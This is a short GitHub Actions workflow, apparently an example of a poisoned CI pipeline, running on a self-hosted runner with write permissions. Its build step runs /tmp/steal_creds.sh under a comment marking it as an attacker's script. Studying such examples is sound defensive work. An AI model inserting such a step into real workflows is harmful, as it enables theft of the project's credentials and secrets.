name: Privileged Workflow
on:
  push:
    branches: [ main ]

permissions:
  contents: write

jobs:
  build:
    runs-on: self-hosted
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Run Build
        run: |
          echo "Building the project..."
          # Attacker's script is executed here
          /tmp/steal_creds.sh